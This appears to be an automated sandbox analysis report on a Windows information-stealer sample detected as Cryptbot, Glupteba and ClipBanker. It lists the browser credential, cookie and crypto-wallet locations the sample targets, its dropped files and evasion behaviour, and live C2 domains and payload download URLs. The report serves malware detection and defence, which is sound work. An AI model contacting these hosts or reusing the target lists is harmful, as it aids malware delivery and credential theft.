                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_key.bin VolumeInformation
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_logins.db VolumeInformation
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Chrome\default_webdata.db VolumeInformation
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Information.txt VolumeInformation
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\_Files\_Screen_Desktop.jpeg VolumeInformation
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\screenshot.jpg VolumeInformation
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\system_info.txt VolumeInformation
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_cookies.db VolumeInformation
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_key.bin VolumeInformation
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_logins.db VolumeInformation
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\djUYPUrixI\files_\_Chrome\default_webdata.db VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\dislip\parted.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00417091 cpuid
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.comRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_00414240 SetFilePointer,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0042A574 _free,_free,_free,GetTimeZoneInformation,_free,
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeCode function: 0_2_0040E340 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,
                      Source: C:\Users\user\AppData\Local\Temp\File.exeCode function: 10_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected CryptbotShow sources
                      Source: Yara matchFile source: 0.2.7yyqdBJVGf.exe.3080e50.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.7yyqdBJVGf.exe.30d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.7yyqdBJVGf.exe.3080e50.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.7yyqdBJVGf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.7yyqdBJVGf.exe.30d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.7yyqdBJVGf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR
                      Yara detected GluptebaShow sources
                      Source: Yara matchFile source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                      Source: 7yyqdBJVGf.exeString found in binary or memory: %AppData%\Electrum-btcp\wallets
                      Source: 7yyqdBJVGf.exeString found in binary or memory: %AppData%\ElectronCash\wallets
                      Source: 7yyqdBJVGf.exeString found in binary or memory: %AppData%\Jaxx\Local Storage
                      Source: 7yyqdBJVGf.exeString found in binary or memory: %AppData%\Exodus\backup
                      Source: 7yyqdBJVGf.exeString found in binary or memory: %AppData%\Exodus\backup
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                      Source: C:\Users\user\Desktop\7yyqdBJVGf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi

                      Remote Access Functionality:

                      barindex
                      Yara detected CryptbotShow sources
                      Source: Yara matchFile source: 0.2.7yyqdBJVGf.exe.3080e50.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.7yyqdBJVGf.exe.30d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.7yyqdBJVGf.exe.3080e50.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.7yyqdBJVGf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.7yyqdBJVGf.exe.30d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.7yyqdBJVGf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR
                      Yara detected GluptebaShow sources
                      Source: Yara matchFile source: Process Memory Space: 7yyqdBJVGf.exe PID: 2916, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsScripting11Startup Items1Startup Items1Deobfuscate/Decode Files or Information11OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                      Default AccountsNative API1Registry Run Keys / Startup Folder2Access Token Manipulation1Scripting11Input Capture11Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter12Logon Script (Windows)Process Injection112Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder2Software Packing13NTDSSystem Information Discovery57Distributed Component Object ModelInput Capture11Scheduled TransferApplication Layer Protocol24SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsQuery Registry1SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading2Cached Domain CredentialsSecurity Software Discovery541VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion341DCSyncProcess Discovery11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemVirtualization/Sandbox Evasion341Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection112/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingRemote System Discovery11Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery2Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 492301 Sample: 7yyqdBJVGf.exe Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 103 Multi AV Scanner detection for domain / URL 2->103 105 Antivirus detection for URL or domain 2->105 107 Multi AV Scanner detection for dropped file 2->107 109 10 other signatures 2->109 12 7yyqdBJVGf.exe 46 2->12         started        17 IntelRapid.exe 2->17         started        19 IntelRapid.exe 2->19         started        21 rundll32.exe 2->21         started        process3 dnsIp4 85 pacdpo22.top 45.140.167.227, 49752, 80 THEFIRST-ASRU United Kingdom 12->85 87 zukelx03.top 185.185.71.183, 49756, 49757, 80 SPRINTHOSTRU Russian Federation 12->87 89 moreil02.top 104.168.214.97, 49755, 80 HOSTWINDSUS United States 12->89 77 C:\Users\user\AppData\Local\Temp\File.exe, PE32 12->77 dropped 79 C:\Users\user\AppData\Local\...\lv[1].exe, PE32 12->79 dropped 127 Detected unpacking (overwrites its own PE header) 12->127 129 Self deletion via cmd delete 12->129 131 Tries to harvest and steal browser information (history, passwords, etc) 12->131 23 File.exe 25 12->23         started        27 cmd.exe 1 12->27         started        133 Query firmware table information (likely to detect VMs) 17->133 135 Hides threads from debuggers 17->135 137 Tries to detect sandboxes / dynamic malware analysis system (registry check) 17->137 file5 signatures6 process7 file8 67 C:\Users\user\AppData\Local\...\wheezy.exe, PE32 23->67 dropped 69 C:\Users\user\AppData\Local\...\parted.exe, PE32+ 23->69 dropped 71 C:\Users\user\AppData\Local\Temp\...\UAC.dll, PE32 23->71 dropped 73 3 other files (none is malicious) 23->73 dropped 119 Multi AV Scanner detection for dropped file 23->119 29 parted.exe 4 23->29         started        33 wheezy.exe 1 5 23->33         started        121 Submitted sample is a known malware sample 27->121 123 Obfuscated command line found 27->123 125 Uses ping.exe to check the status of other devices and networks 27->125 35 conhost.exe 27->35         started        37 timeout.exe 1 27->37         started        signatures9 process10 file11 81 C:\Users\user\AppData\...\IntelRapid.exe, PE32+ 29->81 dropped 139 Multi AV Scanner detection for dropped file 29->139 141 Query firmware table information (likely to detect VMs) 29->141 143 Hides threads from debuggers 29->143 145 Tries to detect sandboxes / dynamic malware analysis system (registry check) 29->145 39 IntelRapid.exe 29->39         started        147 Machine Learning detection for dropped file 33->147 42 cmd.exe 1 33->42         started        44 dllhost.exe 33->44         started        signatures12 process13 signatures14 113 Query firmware table information (likely to detect VMs) 39->113 115 Hides threads from debuggers 39->115 117 Tries to detect sandboxes / dynamic malware analysis system (registry check) 39->117 46 cmd.exe 3 42->46         started        49 conhost.exe 42->49         started        process15 signatures16 149 Obfuscated command line found 46->149 51 Bisogna.exe.com 46->51         started        54 PING.EXE 1 46->54         started        57 findstr.exe 1 46->57         started        process17 dnsIp18 111 May check the online IP address of the machine 51->111 60 Bisogna.exe.com 3 18 51->60         started        83 127.0.0.1 unknown unknown 54->83 75 C:\Users\user\AppData\...\Bisogna.exe.com, Targa 57->75 dropped file19 signatures20 process21 dnsIp22 91 ip-api.com 208.95.112.1, 49836, 80 TUT-ASUS United States 60->91 93 192.168.2.1 unknown unknown 60->93 95 YWPUxosKSQKjQIKzFVtwgwCR.YWPUxosKSQKjQIKzFVtwgwCR 60->95 63 wscript.exe 60->63         started        process23 dnsIp24 97 iplogger.org 88.99.66.31, 443, 49849 HETZNER-ASDE Germany 63->97 99 System process connects to network (likely due to code injection or exploit) 63->99 101 May check the online IP address of the machine 63->101 signatures25

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      7yyqdBJVGf.exe53%VirustotalBrowse
                      7yyqdBJVGf.exe49%ReversingLabsWin32.Trojan.Ulise
                      7yyqdBJVGf.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\foler\olader\acledit.dll0%MetadefenderBrowse
                      C:\Program Files (x86)\foler\olader\acledit.dll0%ReversingLabs
                      C:\Program Files (x86)\foler\olader\acppage.dll0%MetadefenderBrowse
                      C:\Program Files (x86)\foler\olader\acppage.dll0%ReversingLabs
                      C:\Program Files (x86)\foler\olader\adprovider.dll0%MetadefenderBrowse
                      C:\Program Files (x86)\foler\olader\adprovider.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\lv[1].exe33%ReversingLabsWin32.Infostealer.ClipBanker
                      C:\Users\user\AppData\Local\Temp\File.exe33%ReversingLabsWin32.Infostealer.ClipBanker
                      C:\Users\user\AppData\Local\Temp\dislip\parted.exe36%ReversingLabsWin64.Infostealer.ClipBanker
                      C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe9%ReversingLabsWin32.Backdoor.Generic
                      C:\Users\user\AppData\Local\Temp\nsc24D7.tmp\UAC.dll0%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\nsc24D7.tmp\UAC.dll0%ReversingLabs
                      C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe36%ReversingLabsWin64.Infostealer.ClipBanker

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      13.0.wheezy.exe.4e0000.0.unpack100%AviraTR/Dropper.GenDownload File
                      13.2.wheezy.exe.4e0000.0.unpack100%AviraTR/Dropper.GenDownload File
                      24.2.Bisogna.exe.com.f90000.1.unpack100%AviraHEUR/AGEN.1139525Download File
                      0.2.7yyqdBJVGf.exe.400000.0.unpack100%AviraHEUR/AGEN.1142240Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://pacdpo22.top/index.php0%VirustotalBrowse
                      http://pacdpo22.top/index.php0%Avira URL Cloudsafe
                      http://moreil02.top/index.php0%VirustotalBrowse
                      http://moreil02.top/index.php0%Avira URL Cloudsafe
                      http://zukelx03.top/downfiles/lv.exe12%VirustotalBrowse
                      http://zukelx03.top/downfiles/lv.exe100%Avira URL Cloudphishing
                      https://2no.co/2T4yW6UShttp://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7s0%Avira URL Cloudsafe
                      http://zukelx03.top/download.php?file=lv.exe0%Avira URL Cloudsafe
                      http://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7string0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      zukelx03.top
                      		185.185.71.183
                      		truefalse
                        		high
                        ip-api.com
                        		208.95.112.1
                        		truefalse
                          		high
                          iplogger.org
                          		88.99.66.31
                          		truefalse
                            		high
                            pacdpo22.top
                            		45.140.167.227
                            		truefalse
                              		high
                              moreil02.top
                              		104.168.214.97
                              		truefalse
                                		high
                                YWPUxosKSQKjQIKzFVtwgwCR.YWPUxosKSQKjQIKzFVtwgwCR
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://pacdpo22.top/index.phpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://iplogger.org/1N5Jh7false
                                    		high
                                    http://moreil02.top/index.phpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ip-api.com/jsonfalse
                                      		high
                                      http://zukelx03.top/downfiles/lv.exetrue
                                      • 12%, Virustotal, Browse
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      http://zukelx03.top/download.php?file=lv.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ac.ecosia.org/autocomplete?q=7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtab7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                              		high
                                              http://ip-api.com/jsoncountryCodeinvalidBisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmpfalse
                                                		high
                                                http://ip-api.com/jsonC:Bisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmp, Bisogna.exe.com, 00000018.00000002.580849231.0000000000C93000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://ip-api.com/jsonQBisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://ip-api.com/jsonqBisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://ip-api.com/jsonHBisogna.exe.com, 00000018.00000002.585253157.00000000038D6000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                                          		high
                                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                                            		high
                                                            http://nsis.sf.net/NSIS_ErrorErrorFile.exe, 0000000A.00000002.321489177.0000000000409000.00000002.00020000.sdmp, File.exe.0.drfalse
                                                              		high
                                                              https://evernote.com/File.exe, 0000000A.00000002.321537185.0000000000420000.00000004.00020000.sdmp, wheezy.exe.10.drfalse
                                                                		high
                                                                https://2no.co/2T4yW6UShttp://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7sBisogna.exe.com, 00000018.00000002.585433806.0000000003918000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                                                  		high
                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=7yyqdBJVGf.exe, 00000000.00000003.300027811.000000000524C000.00000004.00000001.sdmp, default_webdata.db.0.drfalse
                                                                    		high
                                                                    http://223.252.173.63/4r5tgh/fcvgbth654/fv5yh.exehttps://iplogger.org/1N5Jh7stringBisogna.exe.com, 00000018.00000002.585871027.00000000039B2000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown

                                                                    Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    208.95.112.1
                                                                    		ip-api.comUnited States
                                                                    		53334TUT-ASUSfalse
                                                                    45.140.167.227
                                                                    		pacdpo22.topUnited Kingdom
                                                                    		29182THEFIRST-ASRUfalse
                                                                    104.168.214.97
                                                                    		moreil02.topUnited States
                                                                    		54290HOSTWINDSUSfalse
                                                                    88.99.66.31
                                                                    		iplogger.orgGermany
                                                                    		24940HETZNER-ASDEfalse
                                                                    185.185.71.183
                                                                    		zukelx03.topRussian Federation
                                                                    		35278SPRINTHOSTRUfalse

                                                                    Private

                                                                    IP
                                                                    192.168.2.1
                                                                    127.0.0.1

                                                                    General Information

                                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                                    Analysis ID:492301
                                                                    Start date:28.09.2021
                                                                    Start time:15:22:44
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 15m 44s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:light
                                                                    Sample file name:7yyqdBJVGf.exe
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:42
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
